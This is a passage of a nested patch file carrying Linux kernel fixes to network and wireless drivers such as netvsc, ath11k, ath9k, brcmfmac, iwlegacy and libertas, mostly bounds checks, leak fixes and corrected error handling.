+@@ -970,14 +969,15 @@ static int qede_alloc_fp_array(struct qede_dev *edev)
+ 		goto err;
+ 	}
+ 
+-	mem = krealloc(edev->coal_entry, QEDE_QUEUE_CNT(edev) *
+-		       sizeof(*edev->coal_entry), GFP_KERNEL);
+-	if (!mem) {
+-		DP_ERR(edev, "coalesce entry allocation failed\n");
+-		kfree(edev->coal_entry);
+-		goto err;
++	if (!edev->coal_entry) {
++		edev->coal_entry = kcalloc(QEDE_MAX_RSS_CNT(edev),
++					   sizeof(*edev->coal_entry),
++					   GFP_KERNEL);
++		if (!edev->coal_entry) {
++			DP_ERR(edev, "coalesce entry allocation failed\n");
++			goto err;
++		}
+ 	}
+-	edev->coal_entry = mem;
+ 
+ 	fp_combined = QEDE_QUEUE_CNT(edev) - fp_rx - edev->fp_num_tx;
+ 
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index 79f4e13620a46..da737d959e81c 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -851,6 +851,7 @@ static void netvsc_send_completion(struct net_device *ndev,
+ 	u32 msglen = hv_pkt_datalen(desc);
+ 	struct nvsp_message *pkt_rqst;
+ 	u64 cmd_rqst;
++	u32 status;
+ 
+ 	/* First check if this is a VMBUS completion without data payload */
+ 	if (!msglen) {
+@@ -922,6 +923,23 @@ static void netvsc_send_completion(struct net_device *ndev,
+ 		break;
+ 
+ 	case NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE:
++		if (msglen < sizeof(struct nvsp_message_header) +
++		    sizeof(struct nvsp_1_message_send_rndis_packet_complete)) {
++			if (net_ratelimit())
++				netdev_err(ndev, "nvsp_rndis_pkt_complete length too small: %u\n",
++					   msglen);
++			return;
++		}
++
++		/* If status indicates an error, output a message so we know
++		 * there's a problem. But process the completion anyway so the
++		 * resources are released.
++		 */
++		status = nvsp_packet->msg.v1_msg.send_rndis_pkt_complete.status;
++		if (status != NVSP_STAT_SUCCESS && net_ratelimit())
++			netdev_err(ndev, "nvsp_rndis_pkt_complete error status: %x\n",
++				   status);
++
+ 		netvsc_send_tx_complete(ndev, net_device, incoming_channel,
+ 					desc, budget);
+ 		break;
+diff --git a/drivers/net/ipa/gsi.c b/drivers/net/ipa/gsi.c
+index bea2da1c4c51d..f1a3938294866 100644
+--- a/drivers/net/ipa/gsi.c
++++ b/drivers/net/ipa/gsi.c
+@@ -1666,7 +1666,8 @@ static int gsi_generic_command(struct gsi *gsi, u32 channel_id,
+ 	val = u32_encode_bits(opcode, GENERIC_OPCODE_FMASK);
+ 	val |= u32_encode_bits(channel_id, GENERIC_CHID_FMASK);
+ 	val |= u32_encode_bits(GSI_EE_MODEM, GENERIC_EE_FMASK);
+-	val |= u32_encode_bits(params, GENERIC_PARAMS_FMASK);
++	if (gsi->version >= IPA_VERSION_4_11)
++		val |= u32_encode_bits(params, GENERIC_PARAMS_FMASK);
+ 
+ 	timeout = !gsi_command(gsi, GSI_GENERIC_CMD_OFFSET, val);
+ 
+diff --git a/drivers/net/ipa/gsi_reg.h b/drivers/net/ipa/gsi_reg.h
+index 3763359f208f7..e65f2f055cfff 100644
+--- a/drivers/net/ipa/gsi_reg.h
++++ b/drivers/net/ipa/gsi_reg.h
+@@ -372,7 +372,6 @@ enum gsi_general_id {
+ #define GSI_ERROR_LOG_OFFSET \
+ 			(0x0001f200 + 0x4000 * GSI_EE_AP)
+ 
+-/* Fields below are present for IPA v3.5.1 and above */
+ #define ERR_ARG3_FMASK			GENMASK(3, 0)
+ #define ERR_ARG2_FMASK			GENMASK(7, 4)
+ #define ERR_ARG1_FMASK			GENMASK(11, 8)
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index 9e75ed3f08ce5..760d8d1b6cba4 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -533,7 +533,7 @@ static int tap_open(struct inode *inode, struct file *file)
+ 	q->sock.state = SS_CONNECTED;
+ 	q->sock.file = file;
+ 	q->sock.ops = &tap_socket_ops;
+-	sock_init_data(&q->sock, &q->sk);
++	sock_init_data_uid(&q->sock, &q->sk, inode->i_uid);
+ 	q->sk.sk_write_space = tap_sock_write_space;
+ 	q->sk.sk_destruct = tap_sock_destruct;
+ 	q->flags = IFF_VNET_HDR | IFF_NO_PI | IFF_TAP;
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 24001112c3236..91d198aff2f9a 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -3449,7 +3449,7 @@ static int tun_chr_open(struct inode *inode, struct file * file)
+ 	tfile->socket.file = file;
+ 	tfile->socket.ops = &tun_socket_ops;
+ 
+-	sock_init_data(&tfile->socket, &tfile->sk);
++	sock_init_data_uid(&tfile->socket, &tfile->sk, inode->i_uid);
+ 
+ 	tfile->sk.sk_write_space = tun_sock_write_space;
+ 	tfile->sk.sk_sndbuf = INT_MAX;
+diff --git a/drivers/net/wireless/ath/ath11k/core.h b/drivers/net/wireless/ath/ath11k/core.h
+index c20e84e031fad..bd06536f82a64 100644
+--- a/drivers/net/wireless/ath/ath11k/core.h
++++ b/drivers/net/wireless/ath/ath11k/core.h
+@@ -912,7 +912,6 @@ struct ath11k_base {
+ 	enum ath11k_dfs_region dfs_region;
+ #ifdef CONFIG_ATH11K_DEBUGFS
+ 	struct dentry *debugfs_soc;
+-	struct dentry *debugfs_ath11k;
+ #endif
+ 	struct ath11k_soc_dp_stats soc_stats;
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/debugfs.c b/drivers/net/wireless/ath/ath11k/debugfs.c
+index ccdf3d5ba1ab6..5bb6fd17fdf6f 100644
+--- a/drivers/net/wireless/ath/ath11k/debugfs.c
++++ b/drivers/net/wireless/ath/ath11k/debugfs.c
+@@ -976,10 +976,6 @@ int ath11k_debugfs_pdev_create(struct ath11k_base *ab)
+ 	if (test_bit(ATH11K_FLAG_REGISTERED, &ab->dev_flags))
+ 		return 0;
+ 
+-	ab->debugfs_soc = debugfs_create_dir(ab->hw_params.name, ab->debugfs_ath11k);
+-	if (IS_ERR(ab->debugfs_soc))
+-		return PTR_ERR(ab->debugfs_soc);
+-
+ 	debugfs_create_file("simulate_fw_crash", 0600, ab->debugfs_soc, ab,
+ 			    &fops_simulate_fw_crash);
+ 
+@@ -1001,15 +997,51 @@ void ath11k_debugfs_pdev_destroy(struct ath11k_base *ab)
+ 
+ int ath11k_debugfs_soc_create(struct ath11k_base *ab)
+ {
+-	ab->debugfs_ath11k = debugfs_create_dir("ath11k", NULL);
++	struct dentry *root;
++	bool dput_needed;
++	char name[64];
++	int ret;
++
++	root = debugfs_lookup("ath11k", NULL);
++	if (!root) {
++		root = debugfs_create_dir("ath11k", NULL);
++		if (IS_ERR_OR_NULL(root))
++			return PTR_ERR(root);
++
++		dput_needed = false;
++	} else {
++		/* a dentry from lookup() needs dput() after we don't use it */
++		dput_needed = true;
++	}
++
++	scnprintf(name, sizeof(name), "%s-%s", ath11k_bus_str(ab->hif.bus),
++		  dev_name(ab->dev));
++
++	ab->debugfs_soc = debugfs_create_dir(name, root);
++	if (IS_ERR_OR_NULL(ab->debugfs_soc)) {
++		ret = PTR_ERR(ab->debugfs_soc);
++		goto out;
++	}
++
++	ret = 0;
+ 
+-	return PTR_ERR_OR_ZERO(ab->debugfs_ath11k);
++out:
++	if (dput_needed)
++		dput(root);
++
++	return ret;
+ }
+ 
+ void ath11k_debugfs_soc_destroy(struct ath11k_base *ab)
+ {
+-	debugfs_remove_recursive(ab->debugfs_ath11k);
+-	ab->debugfs_ath11k = NULL;
++	debugfs_remove_recursive(ab->debugfs_soc);
++	ab->debugfs_soc = NULL;
++
++	/* We are not removing ath11k directory on purpose, even if it
++	 * would be empty. This simplifies the directory handling and it's
++	 * a minor cosmetic issue to leave an empty ath11k directory to
++	 * debugfs.
++	 */
+ }
+ EXPORT_SYMBOL(ath11k_debugfs_soc_destroy);
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index c5a4c34d77499..e964e1b722871 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -3126,6 +3126,7 @@ int ath11k_peer_rx_frag_setup(struct ath11k *ar, const u8 *peer_mac, int vdev_id
+ 	if (!peer) {
+ 		ath11k_warn(ab, "failed to find the peer to set up fragment info\n");
+ 		spin_unlock_bh(&ab->base_lock);
++		crypto_free_shash(tfm);
+ 		return -ENOENT;
+ 	}
+ 
+@@ -5022,6 +5023,7 @@ static int ath11k_dp_rx_mon_deliver(struct ath11k *ar, u32 mac_id,
+ 		} else {
+ 			rxs->flag |= RX_FLAG_ALLOW_SAME_PN;
+ 		}
++		rxs->flag |= RX_FLAG_ONLY_MONITOR;
+ 		ath11k_update_radiotap(ar, ppduinfo, mon_skb, rxs);
+ 
+ 		ath11k_dp_rx_deliver_msdu(ar, napi, mon_skb, rxs);
+diff --git a/drivers/net/wireless/ath/ath11k/pci.c b/drivers/net/wireless/ath/ath11k/pci.c
+index 99cf3357c66e1..3c6005ab9a717 100644
+--- a/drivers/net/wireless/ath/ath11k/pci.c
++++ b/drivers/net/wireless/ath/ath11k/pci.c
+@@ -979,7 +979,7 @@ static __maybe_unused int ath11k_pci_pm_suspend(struct device *dev)
+ 	if (ret)
+ 		ath11k_warn(ab, "failed to suspend core: %d\n", ret);
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static __maybe_unused int ath11k_pci_pm_resume(struct device *dev)
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index 1a2e0c7eeb023..f521dfa2f1945 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -561,11 +561,11 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 			memcpy(ptr, skb->data, rx_remain_len);
+ 
+ 			rx_pkt_len += rx_remain_len;
+-			hif_dev->rx_remain_len = 0;
+ 			skb_put(remain_skb, rx_pkt_len);
+ 
+ 			skb_pool[pool_index++] = remain_skb;
+-
++			hif_dev->remain_skb = NULL;
++			hif_dev->rx_remain_len = 0;
+ 		} else {
+ 			index = rx_remain_len;
+ 		}
+@@ -584,16 +584,21 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 		pkt_len = get_unaligned_le16(ptr + index);
+ 		pkt_tag = get_unaligned_le16(ptr + index + 2);
+ 
++		/* It is supposed that if we have an invalid pkt_tag or
++		 * pkt_len then the whole input SKB is considered invalid
++		 * and dropped; the associated packets already in skb_pool
++		 * are dropped, too.
++		 */
+ 		if (pkt_tag != ATH_USB_RX_STREAM_MODE_TAG) {
+ 			RX_STAT_INC(hif_dev, skb_dropped);
+-			return;
++			goto invalid_pkt;
+ 		}
+ 
+ 		if (pkt_len > 2 * MAX_RX_BUF_SIZE) {
+ 			dev_err(&hif_dev->udev->dev,
+ 				"ath9k_htc: invalid pkt_len (%x)\n", pkt_len);
+ 			RX_STAT_INC(hif_dev, skb_dropped);
+-			return;
++			goto invalid_pkt;
+ 		}
+ 
+ 		pad_len = 4 - (pkt_len & 0x3);
+@@ -605,11 +610,6 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 
+ 		if (index > MAX_RX_BUF_SIZE) {
+ 			spin_lock(&hif_dev->rx_lock);
+-			hif_dev->rx_remain_len = index - MAX_RX_BUF_SIZE;
+-			hif_dev->rx_transfer_len =
+-				MAX_RX_BUF_SIZE - chk_idx - 4;
+-			hif_dev->rx_pad_len = pad_len;
+-
+ 			nskb = __dev_alloc_skb(pkt_len + 32, GFP_ATOMIC);
+ 			if (!nskb) {
+ 				dev_err(&hif_dev->udev->dev,
+@@ -617,6 +617,12 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 				spin_unlock(&hif_dev->rx_lock);
+ 				goto err;
+ 			}
++
++			hif_dev->rx_remain_len = index - MAX_RX_BUF_SIZE;
++			hif_dev->rx_transfer_len =
++				MAX_RX_BUF_SIZE - chk_idx - 4;
++			hif_dev->rx_pad_len = pad_len;
++
+ 			skb_reserve(nskb, 32);
+ 			RX_STAT_INC(hif_dev, skb_allocated);
+ 
+@@ -654,6 +660,13 @@ err:
+ 				 skb_pool[i]->len, USB_WLAN_RX_PIPE);
+ 		RX_STAT_INC(hif_dev, skb_completed);
+ 	}
++	return;
++invalid_pkt:
++	for (i = 0; i < pool_index; i++) {
++		dev_kfree_skb_any(skb_pool[i]);
++		RX_STAT_INC(hif_dev, skb_dropped);
++	}
++	return;
+ }
+ 
+ static void ath9k_hif_usb_rx_cb(struct urb *urb)
+@@ -1411,8 +1424,6 @@ static void ath9k_hif_usb_disconnect(struct usb_interface *interface)
+ 
+ 	if (hif_dev->flags & HIF_USB_READY) {
+ 		ath9k_htc_hw_deinit(hif_dev->htc_handle, unplugged);
+-		ath9k_hif_usb_dev_deinit(hif_dev);
+-		ath9k_destroy_wmi(hif_dev->htc_handle->drv_priv);
+ 		ath9k_htc_hw_free(hif_dev->htc_handle);
+ 	}
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_init.c b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+index 07ac88fb1c577..96a3185a96d75 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_init.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+@@ -988,6 +988,8 @@ void ath9k_htc_disconnect_device(struct htc_target *htc_handle, bool hotunplug)
+ 
+ 		ath9k_deinit_device(htc_handle->drv_priv);
+ 		ath9k_stop_wmi(htc_handle->drv_priv);
++		ath9k_hif_usb_dealloc_urbs((struct hif_device_usb *)htc_handle->hif_dev);
++		ath9k_destroy_wmi(htc_handle->drv_priv);
+ 		ieee80211_free_hw(htc_handle->drv_priv->hw);
+ 	}
+ }
+diff --git a/drivers/net/wireless/ath/ath9k/htc_hst.c b/drivers/net/wireless/ath/ath9k/htc_hst.c
+index ca05b07a45e67..fe62ff668f757 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_hst.c
++++ b/drivers/net/wireless/ath/ath9k/htc_hst.c
+@@ -391,7 +391,7 @@ static void ath9k_htc_fw_panic_report(struct htc_target *htc_handle,
+  * HTC Messages are handled directly here and the obtained SKB
+  * is freed.
+  *
+- * Service messages (Data, WMI) passed to the corresponding
++ * Service messages (Data, WMI) are passed to the corresponding
+  * endpoint RX handlers, which have to free the SKB.
+  */
+ void ath9k_htc_rx_msg(struct htc_target *htc_handle,
+@@ -478,6 +478,8 @@ invalid:
+ 		if (endpoint->ep_callbacks.rx)
+ 			endpoint->ep_callbacks.rx(endpoint->ep_callbacks.priv,
+ 						  skb, epid);
++		else
++			goto invalid;
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index f315c54bd3ac0..19345b8f7bfd5 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -341,6 +341,7 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 	if (!time_left) {
+ 		ath_dbg(common, WMI, "Timeout waiting for WMI command: %s\n",
+ 			wmi_cmd_to_name(cmd_id));
++		wmi->last_seq_id = 0;
+ 		mutex_unlock(&wmi->op_mutex);
+ 		return -ETIMEDOUT;
+ 	}
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+index 22344e68fd597..fc5232a896535 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+@@ -298,6 +298,7 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 			 err);
+ 		goto done;
+ 	}
++	buf[sizeof(buf) - 1] = '\0';
+ 	ptr = (char *)buf;
+ 	strsep(&ptr, "\n");
+ 
+@@ -318,15 +319,17 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 	if (err) {
+ 		brcmf_dbg(TRACE, "retrieving clmver failed, %d\n", err);
+ 	} else {
++		buf[sizeof(buf) - 1] = '\0';
+ 		clmver = (char *)buf;
+-		/* store CLM version for adding it to revinfo debugfs file */
+-		memcpy(ifp->drvr->clmver, clmver, sizeof(ifp->drvr->clmver));
+ 
+ 		/* Replace all newline/linefeed characters with space
+ 		 * character
+ 		 */
+ 		strreplace(clmver, '\n', ' ');
+ 
++		/* store CLM version for adding it to revinfo debugfs file */
++		memcpy(ifp->drvr->clmver, clmver, sizeof(ifp->drvr->clmver));
++
+ 		brcmf_dbg(INFO, "CLM version = %s\n", clmver);
+ 	}
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
+index 595ae3ae561ef..175272c2694d7 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
+@@ -335,6 +335,7 @@ static netdev_tx_t brcmf_netdev_start_xmit(struct sk_buff *skb,
+ 			bphy_err(drvr, "%s: failed to expand headroom\n",
+ 				 brcmf_ifname(ifp));
+ 			atomic_inc(&drvr->bus_if->stats.pktcow_failed);
++			dev_kfree_skb(skb);
+ 			goto done;
+ 		}
+ 	}
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
+index cec53f934940a..45fbcbdc7d9e4 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
+@@ -347,8 +347,11 @@ brcmf_msgbuf_alloc_pktid(struct device *dev,
+ 		count++;
+ 	} while (count < pktids->array_size);
+ 
+-	if (count == pktids->array_size)
++	if (count == pktids->array_size) {
++		dma_unmap_single(dev, *physaddr, skb->len - data_offset,
++				 pktids->direction);
+ 		return -ENOMEM;
++	}
+ 
+ 	array[*idx].data_offset = data_offset;
+ 	array[*idx].physaddr = *physaddr;
+diff --git a/drivers/net/wireless/intel/ipw2x00/ipw2200.c b/drivers/net/wireless/intel/ipw2x00/ipw2200.c
+index 5b483de18c81f..9dfa34a740dc9 100644
+--- a/drivers/net/wireless/intel/ipw2x00/ipw2200.c
++++ b/drivers/net/wireless/intel/ipw2x00/ipw2200.c
+@@ -3441,7 +3441,7 @@ static void ipw_rx_queue_reset(struct ipw_priv *priv,
+ 			dma_unmap_single(&priv->pci_dev->dev,
+ 					 rxq->pool[i].dma_addr,
+ 					 IPW_RX_BUF_SIZE, DMA_FROM_DEVICE);
+-			dev_kfree_skb(rxq->pool[i].skb);
++			dev_kfree_skb_irq(rxq->pool[i].skb);
+ 			rxq->pool[i].skb = NULL;
+ 		}
+ 		list_add_tail(&rxq->pool[i].list, &rxq->rx_used);
+@@ -11397,9 +11397,14 @@ static int ipw_wdev_init(struct net_device *dev)
+ 	set_wiphy_dev(wdev->wiphy, &priv->pci_dev->dev);
+ 
+ 	/* With that information in place, we can now register the wiphy... */
+-	if (wiphy_register(wdev->wiphy))
+-		rc = -EIO;
++	rc = wiphy_register(wdev->wiphy);
++	if (rc)
++		goto out;
++
++	return 0;
+ out:
++	kfree(priv->ieee->a_band.channels);
++	kfree(priv->ieee->bg_band.channels);
+ 	return rc;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlegacy/3945-mac.c b/drivers/net/wireless/intel/iwlegacy/3945-mac.c
+index 7352d5b2095f4..9054a910ca357 100644
+--- a/drivers/net/wireless/intel/iwlegacy/3945-mac.c
++++ b/drivers/net/wireless/intel/iwlegacy/3945-mac.c
+@@ -3378,10 +3378,12 @@ static DEVICE_ATTR(dump_errors, 0200, NULL, il3945_dump_error_log);
+  *
+  *****************************************************************************/
+ 
+-static void
++static int
+ il3945_setup_deferred_work(struct il_priv *il)
+ {
+ 	il->workqueue = create_singlethread_workqueue(DRV_NAME);
++	if (!il->workqueue)
++		return -ENOMEM;
+ 
+ 	init_waitqueue_head(&il->wait_command_queue);
+ 
+@@ -3398,6 +3400,8 @@ il3945_setup_deferred_work(struct il_priv *il)
+ 	timer_setup(&il->watchdog, il_bg_watchdog, 0);
+ 
+ 	tasklet_setup(&il->irq_tasklet, il3945_irq_tasklet);
++
++	return 0;
+ }
+ 
+ static void
+@@ -3717,7 +3721,10 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	}
+ 
+ 	il_set_rxon_channel(il, &il->bands[NL80211_BAND_2GHZ].channels[5]);
+-	il3945_setup_deferred_work(il);
++	err = il3945_setup_deferred_work(il);
++	if (err)
++		goto out_remove_sysfs;
++
+ 	il3945_setup_handlers(il);
+ 	il_power_initialize(il);
+ 
+@@ -3729,7 +3736,7 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	err = il3945_setup_mac(il);
+ 	if (err)
+-		goto out_remove_sysfs;
++		goto out_destroy_workqueue;
+ 
+ 	il_dbgfs_register(il, DRV_NAME);
+ 
+@@ -3738,9 +3745,10 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	return 0;
+ 
+-out_remove_sysfs:
++out_destroy_workqueue:
+ 	destroy_workqueue(il->workqueue);
+ 	il->workqueue = NULL;
++out_remove_sysfs:
+ 	sysfs_remove_group(&pdev->dev.kobj, &il3945_attribute_group);
+ out_release_irq:
+ 	free_irq(il->pci_dev->irq, il);
+diff --git a/drivers/net/wireless/intel/iwlegacy/4965-mac.c b/drivers/net/wireless/intel/iwlegacy/4965-mac.c
+index 943de47170c70..78dee8ccfebfe 100644
+--- a/drivers/net/wireless/intel/iwlegacy/4965-mac.c
++++ b/drivers/net/wireless/intel/iwlegacy/4965-mac.c
+@@ -6211,10 +6211,12 @@ out:
+ 	mutex_unlock(&il->mutex);
+ }
+ 
+-static void
++static int
+ il4965_setup_deferred_work(struct il_priv *il)
+ {
+ 	il->workqueue = create_singlethread_workqueue(DRV_NAME);
++	if (!il->workqueue)
++		return -ENOMEM;
+ 
+ 	init_waitqueue_head(&il->wait_command_queue);
+ 
+@@ -6233,6 +6235,8 @@ il4965_setup_deferred_work(struct il_priv *il)
+ 	timer_setup(&il->watchdog, il_bg_watchdog, 0);
+ 
+ 	tasklet_setup(&il->irq_tasklet, il4965_irq_tasklet);
++
++	return 0;
+ }
+ 
+ static void
+@@ -6617,7 +6621,10 @@ il4965_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		goto out_disable_msi;
+ 	}
+ 
+-	il4965_setup_deferred_work(il);
++	err = il4965_setup_deferred_work(il);
++	if (err)
++		goto out_free_irq;
++
+ 	il4965_setup_handlers(il);
+ 
+ 	/*********************************************
+@@ -6655,6 +6662,7 @@ il4965_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ out_destroy_workqueue:
+ 	destroy_workqueue(il->workqueue);
+ 	il->workqueue = NULL;
++out_free_irq:
+ 	free_irq(il->pci_dev->irq, il);
+ out_disable_msi:
+ 	pci_disable_msi(il->pci_dev);
+diff --git a/drivers/net/wireless/intel/iwlegacy/common.c b/drivers/net/wireless/intel/iwlegacy/common.c
+index 341c17fe2af4d..96002121bb8b2 100644
+--- a/drivers/net/wireless/intel/iwlegacy/common.c
++++ b/drivers/net/wireless/intel/iwlegacy/common.c
+@@ -5174,7 +5174,7 @@ il_mac_reset_tsf(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
+ 	memset(&il->current_ht_config, 0, sizeof(struct il_ht_config));
+ 
+ 	/* new association get rid of ibss beacon skb */
+-	dev_kfree_skb(il->beacon_skb);
++	dev_consume_skb_irq(il->beacon_skb);
+ 	il->beacon_skb = NULL;
+ 	il->timestamp = 0;
+ 
+@@ -5293,7 +5293,7 @@ il_beacon_update(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
+ 	}
+ 
+ 	spin_lock_irqsave(&il->lock, flags);
+-	dev_kfree_skb(il->beacon_skb);
++	dev_consume_skb_irq(il->beacon_skb);
+ 	il->beacon_skb = skb;
+ 
+ 	timestamp = ((struct ieee80211_mgmt *)skb->data)->u.beacon.timestamp;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/main.c b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+index c0142093c7682..27eb28290e234 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/main.c
++++ b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+@@ -784,7 +784,7 @@ static void iwl_mei_handle_amt_state(struct mei_cl_device *cldev,
+ 	if (mei->amt_enabled)
+ 		iwl_mei_set_init_conf(mei);
+ 	else if (iwl_mei_cache.ops)
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false, false);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false);
+ 
+ 	schedule_work(&mei->netdev_work);
+ 
+@@ -825,7 +825,7 @@ static void iwl_mei_handle_csme_taking_ownership(struct mei_cl_device *cldev,
+ 		 */
+ 		mei->csme_taking_ownership = true;
+ 
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true, true);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true);
+ 	} else {
+ 		iwl_mei_send_sap_msg(cldev,
+ 				     SAP_MSG_NOTIF_CSME_OWNERSHIP_CONFIRMED);
+@@ -1695,7 +1695,7 @@ int iwl_mei_register(void *priv, const struct iwl_mei_ops *ops)
+ 			if (mei->amt_enabled)
+ 				iwl_mei_send_sap_msg(mei->cldev,
+ 						     SAP_MSG_NOTIF_WIFIDR_UP);
+-			ops->rfkill(priv, mei->link_prot_state, false);
++			ops->rfkill(priv, mei->link_prot_state);
+ 		}
+ 	}
+ 	ret = 0;
+diff --git a/drivers/net/wireless/intersil/orinoco/hw.c b/drivers/net/wireless/intersil/orinoco/hw.c
+index 0aea35c9c11c7..4fcca08e50de2 100644
+--- a/drivers/net/wireless/intersil/orinoco/hw.c
++++ b/drivers/net/wireless/intersil/orinoco/hw.c
+@@ -931,6 +931,8 @@ int __orinoco_hw_setup_enc(struct orinoco_private *priv)
+ 			err = hermes_write_wordrec(hw, USER_BAP,
+ 					HERMES_RID_CNFAUTHENTICATION_AGERE,
+ 					auth_flag);
++			if (err)
++				return err;
+ 		}
+ 		err = hermes_write_wordrec(hw, USER_BAP,
+ 					   HERMES_RID_CNFWEPENABLED_AGERE,
+diff --git a/drivers/net/wireless/marvell/libertas/cmdresp.c b/drivers/net/wireless/marvell/libertas/cmdresp.c
+index cb515c5584c1f..74cb7551f4275 100644
+--- a/drivers/net/wireless/marvell/libertas/cmdresp.c
++++ b/drivers/net/wireless/marvell/libertas/cmdresp.c
+@@ -48,7 +48,7 @@ void lbs_mac_event_disconnected(struct lbs_private *priv,
+ 
+ 	/* Free Tx and Rx packets */
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+-	kfree_skb(priv->currenttxskb);
++	dev_kfree_skb_irq(priv->currenttxskb);
+ 	priv->currenttxskb = NULL;
+ 	priv->tx_pending_len = 0;
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+diff --git a/drivers/net/wireless/marvell/libertas/if_usb.c b/drivers/net/wireless/marvell/libertas/if_usb.c
+index 32fdc4150b605..2240b4db8c036 100644
+--- a/drivers/net/wireless/marvell/libertas/if_usb.c
++++ b/drivers/net/wireless/marvell/libertas/if_usb.c
+@@ -637,7 +637,7 @@ static inline void process_cmdrequest(int recvlength, uint8_t *recvbuff,
+ 	priv->resp_len[i] = (recvlength - MESSAGE_HEADER_LEN);
+ 	memcpy(priv->resp_buf[i], recvbuff + MESSAGE_HEADER_LEN,
+ 		priv->resp_len[i]);
+-	kfree_skb(skb);
++	dev_kfree_skb_irq(skb);
+ 	lbs_notify_command_response(priv, i);
+ 
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+diff --git a/drivers/net/wireless/marvell/libertas/main.c b/drivers/net/wireless/marvell/libertas/main.c
+index 8f5220cee1123..78e8b5aecec0e 100644
+--- a/drivers/net/wireless/marvell/libertas/main.c
++++ b/drivers/net/wireless/marvell/libertas/main.c
+@@ -216,7 +216,7 @@ int lbs_stop_iface(struct lbs_private *priv)
+ 
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+ 	priv->iface_running = false;
+-	kfree_skb(priv->currenttxskb);
++	dev_kfree_skb_irq(priv->currenttxskb);
+ 	priv->currenttxskb = NULL;
+ 	priv->tx_pending_len = 0;
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+@@ -869,6 +869,7 @@ static int lbs_init_adapter(struct lbs_private *priv)
+ 	ret = kfifo_alloc(&priv->event_fifo, sizeof(u32) * 16, GFP_KERNEL);
+ 	if (ret) {
+ 		pr_err("Out of memory allocating event FIFO buffer\n");
++		lbs_free_cmd_buffer(priv);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/net/wireless/marvell/libertas_tf/if_usb.c b/drivers/net/wireless/marvell/libertas_tf/if_usb.c
+index 75b5319d033f3..1750f5e93de21 100644
+--- a/drivers/net/wireless/marvell/libertas_tf/if_usb.c
++++ b/drivers/net/wireless/marvell/libertas_tf/if_usb.c
+@@ -613,7 +613,7 @@ static inline void process_cmdrequest(int recvlength, uint8_t *recvbuff,
